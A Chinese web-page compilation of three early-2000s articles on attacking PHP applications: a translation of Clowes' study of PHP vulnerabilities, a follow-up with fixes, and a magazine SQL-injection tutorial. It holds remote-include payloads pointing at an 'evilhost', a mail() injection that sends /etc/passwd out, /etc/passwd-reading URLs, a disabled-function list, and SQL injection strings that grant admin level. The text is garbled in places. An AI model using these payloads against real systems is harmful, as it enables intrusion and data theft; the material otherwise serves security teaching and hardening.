现在的位置: 首页 > 综合 > 正文

PHP攻击防御

2014年12月05日 ⁄ 综合 ⁄ 共 41277字 ⁄ 字号 评论关闭

如何对PHP程序中的常见漏洞进行攻击(上) 

文章属性:翻译 
文章来源:httpwww.china4lert.org 
文章提交:analysist (analysist_at_china.com) 

如何对PHP程序中的常见漏洞进行攻击(上) 

原著:Shaun Clowes httpwww.securereality.com.au; 
翻译:analysist httpwww.nsfocus.com; 

之所以翻译这篇文章,是因为目前关于CGI安全性的文章都是拿Perl作为例子,而专门介绍ASP,PHP或者JSP安全性的文章则很少。Shaun Clowes的这篇文章比较全面地介绍了PHP的安全问题,原文可以在httpwww.securereality.com.austudyinscarlet.txt找到。 

由于原文比较长,而且有相当一部分是介绍文章的背景或PHP的基础知识,没有涉及到PHP安全方面的内容,因此我没有翻译。如果你想了解这方面的知识,请参考原文。 

文章主要从全局变量,远程文件,文件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性,并且对如何增强PHP的安全性提出了一些有用的建议。 

好了,废话少说,我们言归正传! 

[全局变量] 
PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型也不需要指定,它们会根据上下文环境自动确定。从程序员的角度来看,这无疑是一种极其方便的处理方法。很显然,这也是快速开发语言的一个很有用的特点。一旦一个变量被创建了,就可以在程序中的任何地方使用。这个特点导致的结果就是程序员很少初始化变量,毕竟,当它们第一次创建时,他们是空的。 

很显然,基于PHP的应用程序的主函数一般都是接受用户的输入(主要是表单变量,上载文件和Cookie等),然后对输入数据进行处理,然后把结果返回到客户端浏览器。为了使PHP代码访问用户的输入尽可能容易,实际上PHP是把这些输入数据看作全局变量来处理的。 

例如: 

FORM METHOD=GET ACTION=test.php; 
INPUT TYPE=TEXT NAME=hello; 
INPUT TYPE=SUBMIT; 
FORM; 

很显然,这会显示一个文本框和提交按钮。当用户点击提交按钮时,“test.php”会处理用户的输入,当“test.php”运行时,“$hello”会包含用户在文本框输入的数据。从这里我们应该看出,攻击者可以按照自己的意愿创建任意的全局变量。如果攻击者不是通过表单输入来调用“test.php”,而是直接在浏览器地址栏输入httpservertest.phphello=hi&setup=no,那么,不止是“$hello”被创建,“$setup”也被创建了。 

译者注:这两种方法也就是我们通常说的“POST”和“GET”方法。 
下面的用户认证代码暴露了PHP的全局变量所导致的安全问题: 

php 
  if ($pass == hello) 
    $auth = 1; 
  ...  
  if ($auth == 1) 
    echo some important information; 

上面的代码首先检查用户的密码是否为“hello”,如果匹配的话,设置“$auth”为“1”,即通过认证。之后如果“$suth”为“1”的话,就会显示一些重要信息。 

表面看起来是正确的,而且我们中有相当一部分人是这样做的,但是这段代码犯了想当然的错误,它假定“$auth”在没有设置值的时候是空的,却没有想到攻击者可以创建任何全局变量并赋值,通过类似“httpservertest.phpauth=1”的方法,我们完全可以欺骗这段代码,使它相信我们是已经认证过的。

因此,为了提高PHP程序的安全性,我们不能相信任何没有明确定义的变量。如果程序中的变量很多的话,这可是一项非常艰巨的任务。 

一种常用的保护方式就是检查数组HTTP_GET[]或POST_VARS[]中的变量,这依赖于我们的提交方式(GET或POST)。当PHP配置为打开“track_vars”选项的话(这是缺省值),用户提交的变量就可以在全局变量和上面提到的数组中获得。 

但是值得说明的是,PHP有四个不同的数组变量用来处理用户的输入。HTTP_GET_VARS数组用来处理GET方式提交的变量,HTTP_POST_VARS数组用于处理POST方式提交的变量,HTTP_COOKIE_VARS数组用于处理作为cookie头提交的变量,而对于HTTP_POST_FILES数组(比较新的PHP才提供),则完全是用户用来提交变量的一种可选方式。用户的一个请求可以很容易的把变量存在这四个数组中,因此一个安全的PHP程序应该检查这四个数组。 

[远程文件] 
PHP是一种具有丰富特性的语言,提供了大量的函数,使编程者实现某个功能很容易。但是从安全的角度来看,功能越多,要保证它的安全性就越难,远程文件就是说明这个问题的一个很好的例子: 

php 
  if (!($fd = fopen($filename, r)) 
    echo(Could not open file $filename
;n); 

上面的脚本试图打开文件“$filename”,如果失败就显示错误信息。很明显,如果我们能够指定“$filename”的话,就能利用这个脚本浏览系统中的任何文件。但是,这个脚本还存在一个不太明显的特性,那就是它可以从任何其它WEB或FTP站点读取文件。实际上,PHP的大多数文件处理函数对远程文件的处理是透明的。 

例如: 
如果指定“$filename”为“httptargetscripts..Á..winntsystem32cmd.exec+dir” 
则上面的代码实际上是利用主机target上的unicode漏洞,执行了dir命令。 

这使得支持远程文件的include(),require(),include_once()和require_once()在上下文环境中变得更有趣。这些函数主要功能是包含指定文件的内容,并且把它们按照PHP代码解释,主要是用在库文件上。 

例如: 
php 
  include($libdir . languages.php); 

上例中“$libdir”一般是一个在执行代码前已经设置好的路径,如果攻击者能够使得“$libdir”没有被设置的话,那么他就可以改变这个路径。但是攻击者并不能做任何事情,因为他们只能在他们指定的路径中访问文件languages.php(perl中的“Poison null byte”攻击对PHP没有作用)。但是由于有了对远程文件的支持,攻击者就可以做任何事情。例如,攻击者可以在某台服务器上放一个文件languages.php,包含如下内容: 

php 
  passthru(binls etc); 

然后把“$libdir”设置为“httpevilhost;”,这样我们就可以在目标主机上执行上面的攻击代码,“etc”目录的内容作为结果返回到客户的浏览器中。 

需要注意的是,攻击服务器(也就是evilhost)应该不能执行PHP代码,否则攻击代码会在攻击服务器,而不是目标服务器执行,如果你想了解具体的技术细节,请参考:httpwww.securereality.com.ausradv00006.txt 

[文件上载] 
PHP自动支持基于RFC 1867的文件上载,我们看下面的例子: 

FORM METHOD=POST ENCTYPE=multipartform-data; 
INPUT TYPE=FILE NAME=hello; 
INPUT TYPE=HIDDEN NAME=MAX_FILE_SIZE VALUE=10240; 
INPUT TYPE=SUBMIT; 
FORM; 

上面的代码让用户从本地机器选择一个文件,当点击提交后,文件就会被上载到服务器。这显然是很有用的功能,但是PHP的响应方式使这项功能变的不安全。当PHP第一次接到这种请求,甚至在它开始解析被调用的PHP代码之前,它会先接受远程用户的文件,检查文件的长度是否超过“$MAX_FILE_SIZE variable”定义的值,如果通过这些测试的话,文件就会被存在本地的一个临时目录中。 

因此,攻击者可以发送任意文件给运行PHP的主机,在PHP程序还没有决定是否接受文件上载时,文件已经被存在服务器上了。 

这里我就不讨论利用文件上载来对服务器进行DOS攻击的可能性了。 

让我们考虑一下处理文件上载的PHP程序,正如我们上面说的,文件被接收并且存在服务器上(位置是在配置文件中指定的,一般是tmp),扩展名一般是随机的,类似“phpxXuoXG”的形式。PHP程序需要上载文件的信息以便处理它,这可以通过两种方式,一种方式是在PHP 3中已经使用的,另一种是在我们对以前的方法提出安全公告后引入的。 

但是,我们可以肯定的说,问题还是存在的,大多数PHP程序还是使用老的方式来处理上载文件。PHP设置了四个全局变量来描述上载文件,比如说上面的例子: 

$hello = Filename on local machine (e.g tmpphpxXuoXG) 
$hello_size = Size in bytes of file (e.g 1024) 
$hello_name = The original name of the file on the remote system (e.g ctemphello.txt) 
$hello_type = Mime type of uploaded file (e.g textplain) 

然后PHP程序开始处理根据“$hello”指定的文件,问题在于“$hello”不一定是一个PHP设置的变量,任何远程用户都可以指定它。如果我们使用下面的方式: 

httpvulnhostvuln.phphello=etcpasswd&hello_size=10240&hello_type=textplain&hello_name=hello.txt 

就导致了下面的PHP全局变量(当然POST方式也可以(甚至是Cookie)): 

$hello = etcpasswd 
$hello_size = 10240 
$hello_type = textplain 
$hello_name = hello.txt 

上面的表单数据正好满足了PHP程序所期望的变量,但是这时PHP程序不再处理上载的文件,而是处理“etcpasswd”(通常会导致内容暴露)。这种攻击可以用于暴露任何敏感文件的内容。 

我在前面已经说了,新版本的PHP使用HTTP_POST_FILES[]来决定上载文件,同时也提供了很多函数来解决这个问题,例如有一个函数用来判断某个文件是不是实际上载的文件。这些函数很好的解决了这个问题,但是实际上肯定有很多PHP程序仍然使用旧的方法,很容易受到这种攻击。 

作为文件上载的攻击方法的一个变种,我们看一下下面的一段代码: 

php 
  if (file_exists($theme))  Checks the file exists on the local system (no remote files) 
include($theme); 

如果攻击者可以控制“$theme”的话,很显然它可以利用“$theme”来读取远程系统上的任何文件。攻击者的最终目标是在远程服务器上执行任意指令,但是他无法使用远程文件,因此,他必须得在远程服务器上创建一个PHP文件。这乍看起来好象是不可能的,但是文件上载帮了我们这个忙,如果攻击者先在本地机器上创建一个包含PHP代码的文件,然后创建一个包含名为“theme”的文件域的表单,最后用这个表单通过文件上载把创建的包含PHP代码的文件提交给上面的代码,PHP就会把攻击者提交的文件保存起来,并把“$theme”的值设置为攻击者提交的文件,这样file_exists()函数会检查通过,攻击者的代码也将执行。 

获得执行任意指令的能力之后,攻击者显然想提升权限或者是扩大战果,而这又需要一些服务器上没有的工具集,而文件上载又一次帮了我们这个忙。攻击者可以使用文件上载功能上载工具,把她们存在服务器上,然后利用他们执行指令的能力,使用chmod()改变文件的权限,然后执行。例如:攻击者可以绕过防火墙或IDS上载一个本地root攻击程序,然后执行,这样就获得了root权限。 

未完待续;  
如何对PHP程序中的常见漏洞进行攻击(下) 

创建时间:2001-07-18 
文章属性:翻译 
文章来源:httpwww.china4lert.org 
文章提交:analysist (analysist_at_china.com) 

如何对PHP程序中的常见漏洞进行攻击(下) 

原著:Shaun Clowes httpwww.securereality.com.au; 
翻译:analysist httpwww.nsfocus.com; 

[库文件] 
正如我们前面讨论的那样,include()和require()主要是为了支持代码库,因为我们一般是把一些经常使用的函数放到一个独立的文件中,这个独立的文件就是代码库,当需要使用其中的函数时,我们只要把这个代码库包含到当前的文件中就可以了。 

最初,人们开发和发布PHP程序的时候,为了区别代码库和主程序代码,一般是为代码库文件设置一个“.inc”的扩展名,但是他们很快发现这是一个错误,因为这样的文件无法被PHP解释器正确解析为PHP代码。如果我们直接请求服务器上的这种文件时,我们就会得到该文件的源代码,这是因为当把PHP作为Apache的模块使用时,PHP解释器是根据文件的扩展名来决定是否解析为PHP代码的。扩展名是站点管理员指定的,一般是“.php”, “.php3”和“.php4”。如果重要的配置数据被包含在没有合适的扩展名的PHP文件中,那么远程攻击者很容易得到这些信息。 

最简单的解决方法就是给每个文件都指定一个PHP文件的扩展名,这样可以很好的防止泄露源代码的问题,但是又产生了新的问题,通过请求这个文件,攻击者可能使本该在上下文环境中运行的代码独立运行,这可能导致前面讨论的全部攻击。 

下面是一个很明显的例子: 

In main.php 
php 
  $libDir = libdir; 
  $langDir = $libdirlanguages; 

  ... 

  include($libdirloadlanguage.php 

In libdirloadlanguage.php 
php 
  ... 

  include($langDir$userLang); 

当“libdirloadlanguage.php”被“main.php”调用时是相当安全的,但是因为“libdirloadlanguage”具有“.php”的扩展名,因此远程攻击者可以直接请求这个文件,并且可以任意指定“$langDir”和“$userLang”的值。 
[Session文件] 
PHP 4或更新的版本提供了对sessions的支持,它的主要作用是在PHP程序中保存页与页之间的状态信息。例如,当一个用户登陆进入网站,他登陆了这个事实以及谁登陆进入这个网站都被保存在session中,当他在网站中到处浏览时,所有的PHP代码都可以获得这些状态信息。 

事实上,当一个session启动时(实际上是在配置文件中设置为在第一次请求时自动启动),就会生成一个随机的“session id”,如果远程浏览器总是在发送请求时提交这个“session id”的话,session就会一直保持。这通过Cookie很容易实现,也可以通过在每页提交一个表单变量(包含“session id”)来实现。PHP程序可以用session注册一个特殊的变量,它的值会在每个PHP脚本结束后存在session文件中,也会在每个PHP脚本开始前加载到变量中。下面是一个简单的例子: 

php 
  session_destroy();  Kill any data currently in the session 
  $session_auth = shaun; 
  session_register(session_auth);  Register $session_auth as a session variable 

新版本的PHP都会自动把“$session_auth”的值设置为“shaun”,如果它们被修改的话,以后的脚本都会自动接受修改后的值,这对无状态的Web来说的确是种很不错的工具,但是我们也应该小心。 

一个很明显的问题就是确保变量的确来自session,例如,给定上面的代码,如果后续的脚本是下面这样的话:

php 
  if (!empty($session_auth)) 
    Grant access to site here 

上面的代码假定如果“$session_auth”被置位的话,就是从session,而不是从用户输入来置位的,如果攻击者通过表单输入来置位的话,他就可以获得对站点的访问权。注意攻击者必须在session注册该变量之前使用这种攻击方法,一旦变量被放进了session,就会覆盖任何表单输入。 

Session数据一般是保存在文件中(位置是可配置的,一般是“tmp”),文件名一般是类似“sess_session id;”的形式,这个文件包含变量名称,变量类型,变量值和一些其它的数据。在多主机系统中,因为文件是以运行Web服务器的用户身份(一般是nobody)保存的,因此恶意的站点拥有者就可以通过创建一个session文件来获得对其它站点的访问,甚至可以检查session文件中的敏感信息。 

Session机制也为攻击者把自己的输入保存在远程系统的文件中提供了另一个方便的地方,对于上面的例子来说,攻击者需要在远程系统放置一个包含PHP代码的文件,如果不能利用文件上载做到的话,他通常会利用session为一个变量按照自己的意愿赋一个值,然后猜测session文件的位置,而他知道文件名是“phpsession id;”,所以只需猜测目录,而目录一般就是“tmp”。 

另外,攻击者可以任意指定“session id”(例如“hello”),然后用这个“session id”创建一个session文件(例如“tmpsess_hello”),但是“session id”只能是字母和数字组合。 

[数据类型] 
PHP具有比较松散的数据类型,变量的类型依赖于它们所处的上下文环境。例如:“$hello”开始是字符串变量,值为“”,但是在求值时,就变成了整形变量“0”,这有时可能会导致一些意想不到的结果。如果“$hello”的值为“000”还是为“0”是不同的,empty()返回的结果也不会为真。 

PHP中的数组是关联数组,也就是说,数组的索引是字符串型的。这意味着“$hello[000]”和“$hello[0]”也是不同的。 

开发程序的时候应该仔细地考虑上面的问题,例如,我们不应该在一个地方测试某个变量是否为“0”,而在另外的地方使用empty()来验证。 

[容易出错的函数] 
我们在分析PHP程序中的漏洞时,如果能够拿到源代码的话,那么一份容易出错的函数列表则是我们非常需要的。如果我们能够远程改变这些函数的参数的话,那么我们就很可能发现其中的漏洞。下面是一份比较详细的容易出错的函数列表: 

PHP代码执行; 
require():读取指定文件的内容并且作为PHP代码解释 
include():同上 
eval():把给定的字符串作为PHP代码执行 
preg_replace():当与“e”开关一起使用时,替换字符串将被解释为PHP代码 

命令执行; 
exec():执行指定的命令,返回执行结果的最后一行 
passthru():执行指定命令,返回所有结果到客户浏览器 
``:执行指定命令,返回所有结果到一个数组 
system():同passthru(),但是不处理二进制数据 
popen():执行指定的命令,把输入或输出连接到PHP文件描述符 

文件泄露; 
fopen():打开文件,并对应一个PHP文件描述符 
readfile():读取文件的内容,然后输出到客户浏览器 
file():把整个文件内容读到一个数组中 

译者注:其实这份列表还不是很全,比如“mail()”等命令也可能执行命令,所以需要自己补充一下。 
[如何增强PHP的安全性] 
我在上面介绍的所有攻击对于缺省安装的PHP 4都可以很好的实现,但是我已经重复了很多次,PHP的配置非常灵活,通过配置一些PHP选项,我们完全可能抵抗其中的一些攻击。下面我按照实现的难度对一些配置进行了分类: 

低难度 
中低难度 
中高难度 
高难度 

上面的分类只是个人的看法,但是我可以保证,如果你使用了PHP提供的所有选项的话,那么你的PHP将是很安全的,即使是第三方的代码也是如此,因为其中很多功能已经不能使用。 

 设置“register_globals”为“off” 
这个选项会禁止PHP为用户输入创建全局变量,也就是说,如果用户提交表单变量“hello”,PHP不会创建“$ hello”,而只会创建“HTTP_GETPOST_VARS['hello']”。这是PHP中一个极其重要的选项,关闭这个选项,会给编程带来很大的不便。 

 设置“safe_mode”为“on” 
打开这个选项,会增加如下限制: 
1.    限制哪个命令可以被执行 
2.    限制哪个函数可以被使用 
3.    基于脚本所有权和目标文件所有权的文件访问限制 
4.    禁止文件上载功能 
这对于ISP来说是一个伟大的选项,同时它也能极大地改进PHP的安全性。 

 设置“open_basedir” 
这个选项可以禁止指定目录之外的文件操作,有效地消除了本地文件或者是远程文件被include()的攻击,但是仍需要注意文件上载和session文件的攻击。 

 设置“display_errors”为“off”,设置“log_errors”为“on” 
这个选项禁止把错误信息显示在网页中,而是记录到日志文件中,这可以有效的抵制攻击者对目标脚本中函数的探测。 

 设置“allow_url_fopen”为“off” 
这个选项可以禁止远程文件功能,极力推荐! 

好了,文章到此为止了,如果你想了解一些其它的相关信息,请参考原文httpwww.securereality.com.austudyinscarlet.txt。 

全文完;  
对PHP程序中的常见漏洞进行攻击之狗尾续貂 

创建时间:2001-07-27 
文章属性:原创 
文章来源:httpwww.xfocus.org 
文章提交:san (san_at_xfocus.org) 

A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications 
之狗尾续貂 

by san@netguard.com.cn 

Shaun Clowes的文章Exploiting Common Vulnerabilities in PHP Applications的确写的很棒, 
考虑到了很多方面,我这个文章只是狗尾续貂,补充一些其它没怎么提到的问题。本文侧重于解决问题,而不是 
攻击。 

1、古老的欺骗SQL语句 
在默认模式下,即使是你忘了把php.ini拷到usrlocallibphp.ini下,php还是打开magic_quotes_gpc=on。 
这样所有从GETPOSTCookie来的变量的单引号(')、双引号()、反斜杠backslash()以及空字元NUL 
(the null byte)都会被加上反斜杠,以使数据库能够正确查询。 
但是在php-4-RC2的时候引入了一个配置文件php.ini-optimized,这个优化的php.ini却是 
magic_quotes_gpc=off的。某些网管看到optimized字样也许就会把php.ini-optimized拷到 
usrlocallibphp.ini,这时就比较危险。象比较简单的验证,假设没有过滤必要的字符: 
select  from login where user='$HTTP_POST_VARS[user]' and pass='$HTTP_POST_VARS[pass]' 
我们就可以在用户框和密码框输入1‘ or 1='1通过验证了。这是非常古董的方法了,这个语句会 
替换成这样: 
select  from login where user='1' or 1='1' and pass='1' or 1='1' 
因为or 1='1'成立,所以通过了。 
解决的办法最好就是过滤所有不必要的字符,还有就是推荐对于从GETPOSTCookie来的并且用在SQL 
中的变量加一个自定义的函数: 
function gpc2sql($str) { 
    if(get_magic_quotes_gpc()==1)  
        return $str; 
    else  
        return addslashes($str); 

主要是为了你的程序能安全移植在各种系统里。 

2、mail函数的第五个参数 
在php-4.0.5的时候,mail函数引入了第五个参数,用来设置在实际发送邮件的时候增加额外的命令行参数, 
但是没有很好的检查特殊SHELL命令字符,所以出现执行命令的大问题。就像手册里的例子: 
mail(nobody@aol.com, the subject, $message, From webmaster@$SERVER_NAME, -fwebmaster@$SERVERNAME); 
这个是存在问题的,如果$SERVER_NAME=;mail san@xfocus.org  etcpasswd就能把机器的密码发送 
到我的信箱了。 
这里提醒一下,php手册里还有好几个例子存在安全问题的,大家实际使用的时候不要照搬,它只是演示函数的
基本功能,理解了就可以了。 
对于mail函数的这个问题,最简单的我们就不用这个第五个参数,要使用就过滤非法的字符如(;),还有就是修改 
php源码包的程序extstandardmail.c,在if (extra_cmd != NULL) { 前增加如下一行:  
extra_cmd=NULL 
然后重新编译。 

3、UNIX版的require, include函数 
win版本的require和include函数是不支持HTTP和FTP远程文件包含的,而UNIX版本默认都是支持远程包含文件。 
require和include不管你是什么扩展名的,把你包含进来就作为程序的一部分来执行。 
我们在写程序的时候为了程序的模块化,以及程序的可移植性,不可避免的用到很多require或include函数, 
而且有时用变量作为参数,比如:include($something); 如果这时用户能控制$something参数,而这个 
参数又没有过滤,那就惨拉。 
首先可以看任何web用户有读权限的文件,假设这个程序叫httpvictimtest.php,这样我们就可以用如下 
url httpvictimtest.phpsomething=etcpasswd 看到etcpasswd文件。 
另外可以利用其远程文件包含的功能执行命令。比如我在httpwww.xfocus.org下建立一个文件test.php,内容是: 
passthru($cmd);,那么我就可以用如下的url 
httpvictimtest.phpsomething=httpwww.xfocus.orgtest.phpcmd=uname这种方式运行任 
意的命令。 
phpMyAdmin也出现了这个问题,我们可以用它看任何我们想看的文件。但是它在include前,先用file_exist 
函数判断文件是否存在,而这个file_exist是不支持远程文件的,所以上面第二种办法无法直接使用。但是我们 
可以利用apache的日志功能,请求一个带php代码的url,这样,something指定为apache的日志也可以执行命 
令了,但是apache的日志通常比较大,有太多杂乱信息。 
httpwww.securereality.com.ausradv00008.txt提到的办法比较巧妙,用file upload的方式把本地 
的执行命令的脚本上传,会在服务器的文件上传临时目录里产生php8Ta02I之类的文件名,由于这时文件是存在的 
,所以能通过file_exist函数,从而执行上传文件里的执行脚本。 

所以对于include, require函数的使用一定要小心,特别是以包含的文件以参数指定这种方式,参数绝对不能 
让用户来控制。还有通过修改php.ini文件去掉远程文件包含这个功能。这个在php-4.0.3以前用 
disable-url-fopen-wrapper 在以后的版本用allow_url_fopen = off来关闭。 

4、disable_function 
在php-4.0.1,php.ini里引入了一项功能disable_functions , 这个功能比较有用,可以用它禁止一些函数。 
比如在php.ini里加上disable_functions = passthru exec system popen 那么在执行这些函数的时候 
只会提示Warning system() has been disabled for security reasons.  
唉,但是也不是没有办法执行系统命令了。因为php采用了很多perl的特性,比如还可以用(`)来执行命令: 
 
$output = `ls -al`; 
echo pre;$outputpre;; 

这个只有设成safe_mode才能避免,可是可恶的safe_mode实在是限制太多了,做其它事情也有些碍手碍脚。 

5、file upload 
php文件上传的问题在文章httpwww.securereality.com.ausradv00001.html里已经描述的很清楚了, 
这的确是个比较严重的问题,一般我们要上传的文件也会放在web目录,所以容易给攻击者得到系统的一些web用户 
能读的文件。 
幸亏在php-4.0.3以后提供了is_uploaded_file和move_uploaded_file函数。所以php-4.0.3以上的上传文 
件的程序一定不要再用copy函数了,用move_uploaded_file代替,它会检查是否是上传的文件。如果是php-4.0.2 
及以下的,建议在copy前加一个函数: 
function is_uploaded_file($filename) { 
    if (!$tmp_file = get_cfg_var('upload_tmp_dir')) { 
        $tmp_file = dirname(tempnam('', '')); 
    } 
    $tmp_file.=''.basename($filename); 
     User might have trailing slash in php.ini...  
    return (ereg_replace('+', '', $tmp_file) == $filename); 

这个漏洞在安全焦点呆了很久,只是在copy之前有很多验证阿、判断阿的语句,所以使之攻击存在相当的难度,赫赫。 

还有,千万不要以环境变量、Cookie变量、session变量等作为关系生死的判断条件,因为这些变量太容易被伪造了。 
呵呵,手头事情比较多,其它慢慢想到了再加吧,也欢迎其他同志任意的添加修改之。 

参考文献 
1、PHP 4 ChangeLog (httpwww.php.netChangeLog-4.php) 
2、A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications  
   (httpwww.securereality.com.austudyinscarlet.txt)及analysist的翻译。 
3、Remote command execution vulnerabilities in phpMyAdmin and phpPgAdmin  
   (httpwww.securereality.com.ausradv00008.txt)  

php注入专题 

创建时间:2005-03-09 
文章属性:原创 
文章提交:54alpha (netsh_at_163.com) 

php注入专题 
                                          ------------Alpha 

此文已发于《黑客x档案》2004年10期专题。 
谨以此文献给最爱我的爸爸妈妈,以及所有帮助过我的人。 

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@由于xfocus不支持上传图片 
您可以到httpwww.54hack.infotxtphp.pdf下载此文的pdf文档(含图片) 

Php注入攻击是现今最流行的攻击方式,依靠它强大的灵活性吸引了广大黑迷。 

在上一期的《php安全与注射专题》中林.linx主要讲述了php程序的各种漏洞,也讲到了php+mysql注入的问题,可是讲的注入的问题比较少,让我们感觉没有尽兴是吧. 
OK,这一期我将给大家伙仔仔细细的吹一吹php+mysql注入,一定让你满载而归哦(谁扔砖头哩!)。 
本文主要是为小菜们服务的,如果你已经是一只老鸟呢,可能某些东西会感觉比较乏味,但只要你仔细的看,你会发现很多有趣的东西哦。 

阅读此文你只要明白下面的这点东西就够了。 

1.明白php+mysql环境是如何搭建的,在光盘中我们收录搭建的相关文章,如果您对搭建php+mysql环境不是很清楚,请先查阅此文,在上一期的专题中也有所介绍。 
2.大概了解php和apache的配置,主要用到php.ini和httpd.conf 
而此文我们主要用到的是php.ini的配置。为了安全起见我们一般都打开php.ini里的安全模式,即让safe_mode = On,还有一个就是返回php执行错误的display_errors 这会返回很多有用的信息,所以我们应该关闭之, 
即让display_errors=off  关闭错误显示后,php函数执行错误的信息将不会再显示给用户。 
在php的配置文件php.ini中还有一个非常重要的配置选项magic_quotes_gpc,高版本的默认都是magic_quotes_gpc=On,只有在原来的古董级的php中的 
默认配置是magic_quotes_gpc=Off,可是古董的东西也有人用的哦! 
当php.ini中magic_quotes_gpc=On的时候会有什么情况发生哩,不用惊慌,天是塌不下来的啦!它只是把提交的变量中所有的 ' (单引号), “ (双引号),  (反斜线) 和 空字符会自动转为含有反斜线的转义字符,例如把’变成了’,把变成了。 
就是这一点,让我们很不爽哦,很多时候我们对字符型的就只好说BYEBYE了, 
但是不用气馁,我们还是会有好方法来对付它的,往下看咯! 
3.有一定的php语言基础和了解一些sql语句,这些都很简单,我们用到的东西很少,所以充电还来的及哦! 

我们先来看看magic_quotes_gpc=Off的时候我们能干些啥,然后我们再想办法搞一搞magic_quotes_gpc=On的情况哈 

一:magic_quotes_gpc=Off时的注入攻击 
magic_quotes_gpc=Off的情况虽然说很不安全,新版本默认也让 
magic_quotes_gpc=On了,可是在很多服务器中我们还发现magic_quotes_gpc=Off的情况,例如httpwww.qichi.。 
还有某些程序像vbb论坛就算你配置magic_quotes_gpc=On,它也会自动消除转义字符让我们有机可乘,所以说
magic_quotes_gpc=Off的注入方式还是大有市场的。 

下面我们将从语法,注入点 and 注入类型几个方面来详细讲解mysql+php注入 

A从MYSQL语法方面先 
  1。先讲一些mysql的基本语法,算是给没有好好学习的孩子补课了哦~_~ 
      1)select 
    SELECT [STRAIGHT_JOIN] [SQL_SMALL_RESULT]  
    select_expression,... 
    [INTO {OUTFILE  DUMPFILE} 'file_name' export_options] 
    [FROM table_references 
        [WHERE where_definition] 
        [GROUP BY col_name,...] 
[ORDER BY {unsigned_integer  col_name  formula} [ASC  DESC] ,...] 
      ] 
常用的就是这些,select_expression指想要检索的列,后面我们可以用where来限制条件,我们也可以用into outfile将select结果输出到文件中。当然我们也可以用select直接输出 
例如 

mysql; select 'a'; 
+---+ 
 a  
+---+ 
 a  
+---+ 
1 row in set (0.00 sec) 
具体内容请看mysql中文手册7.12节 
下面说一些利用啦 
看代码先 
这段代码是用来搜索的哦 

form method=“POST” action=“ echo $PHP_SELF; ;“;  
input type=“text” name=“search”;br;  
input type=“submit” value=“Search”;  
form;  
php 
……… 
SELECT  FROM users WHERE username LIKE ‘%$search%’ ORDER BY username 
……. 

这里我们顺便说一下mysql中的通配符,’%’就是通配符,其它的通配符还有’’和’_’,其中  用来匹配字段名,而 % 用来匹配字段值,注意的是%必须与like一起适用,还有一个通配符,就是下划线 _ ,它代表的意思和上面不同,是用来匹配任何单个的字符的。在上面的代码中我们用到了’’表示返回的所有字段名,%$search%表示所有包含$search字符的内容。 

我们如何注入哩? 
哈哈,和asp里很相似 
在表单里提交 
Aabb%’ or 1=1 order by id# 
注:#在mysql中表示注释的意思,即让后面的sql语句不执行,后面将讲到。 
或许有人会问为什么要用or 1=1呢,看下面, 

把提交的内容带入到sql语句中成为 

SELECT  FROM users WHERE username LIKE ‘%aabb%’ or 1=1 order by id# ORDER BY username 

假如没有含有aabb的用户名,那么or 1=1使返回值仍为真,使能返回所有值 

我们还可以这样 

在表单里提交 
%’ order by id# 
或者 
’ order by id# 
带入sql语句中成了 
SELECT  FROM users WHERE username LIKE ‘% %’ order by id# ORDER BY username 
和 
SELECT  FROM users WHERE username LIKE ‘%%’ order by id# ORDER BY username 
当然了,内容全部返回。 
列出所有用户了哟,没准连密码都出来哩。 
这里就举个例子先,下面会有更精妙的select语句出现,select实际上几乎是无处不在的哦! 
2)下面看update咯 
Mysql中文手册里这么解释的: 
UPDATE [LOW_PRIORITY] tbl_name SET col_name1=expr1,col_name2=expr2,... 
        [WHERE where_definition]  
UPDATE用新值更新现存表中行的列,SET子句指出哪个列要修改和他们应该被给定的值,WHERE子句,如果给出,指定哪个行应该被更新,否则所有行被更新。 
详细内容去看mysql中文手册7.17节啦,在这里详细介绍的话会很罗嗦的哦。 
由上可知update主要用于数据的更新,例如文章的修改,用户资料的修改,我们似乎更关心后者,因为...... 
看代码先哦 
我们先给出表的结构,这样大家看的明白 
CREATE TABLE users (  
id int(10) NOT NULL auto_increment,  
login varchar(25),  
password varchar(25), 
email varchar(30),  
userlevel tinyint,  
PRIMARY KEY (id)  

其中userlevel表示等级,1为管理员,2为普通用户 
php 
change.php 
…… 
$sql = UPDATE users SET password='$pass', email='$email' WHERE id='$id' 
…… 

Ok,我们开始注入了哦,在添email的地方我们添入 
netsh@163.com’,userlevel=’1 
sql语句执行的就是 
UPDATE users SET password='youpass', 
email='netsh@163.com’,userlevel=’1’ WHERE id='youid’ 
看看我们的userlevel就是1了,变成管理员了哟 
哈哈,如此之爽,简直是居家旅行必备啊。 
这里我们简单提一下单引号闭合的问题,如果只用了一个单引号而没有单引号与之组成一对,系统会返回错误。列类型主要分为数字类型,日期和时间类型,字符串类型,然而引号一般用在字符串类型里,而在数字类型里一般人都不会用到引号(然而却是可以用的,而且威力很大),日期和时间类型就很少用于注入了(因为很少有提交时间变量的)。在下面我们会详细将这几种类型的注入方式哦! 

3)下面轮到insert了,它已经等的不耐烦了,简直就像中午食堂里的学生们。 
Php中文手册是这样教我们的: 
INSERT [LOW_PRIORITY  DELAYED] [IGNORE] 
        [INTO] tbl_name [(col_name,...)] 
        VALUES (expression,...),(...),... 
INSERT把新行插入到一个存在的表中,INSERT ... VALUES形式的语句基于明确指定的值插入行,INSERT ... SELECT形式插入从其他表选择的行,有多个值表的INSERT ... VALUES的形式在MySQL 3.22.5或以后版本中支持,col_name=expression语法在MySQL 3.22.10或以后版本中支持。 
由此可见对于见不到后台的我们来说,insert主要就出现在注册的地方,或者有其它提交的地方地方也可以哦。 

看看表的结构先 
CREATE TABLE membres (  
id varchar(15) NOT NULL default '',  
login varchar(25),  
password varchar(25),  
email varchar(30),  
userlevel tinyint,  
PRIMARY KEY (id)  
)  
我们仍然假设userlevel表示用户等级,1为管理者,2为普通用户哈。 
代码如下 
php 
reg.php 
…… 
$query = INSERT INTO members VALUES('$id','$login','$pass','$email',’2') ; 
…… 

默认插入用户等级是2 
现在我们构建注入语句了哦 
还是在要我们输入email的地方输入: 
netsh@163.com’,’1’)# 
sql语句执行时变成了: 
INSERT INTO membres VALUES ('youid','youname','youpass',' netsh@163.com’,’1’)#',')  
看我们一注册就是管理员了。 
#号表示什么来着,不是忘了吧,晕了,这么快? 
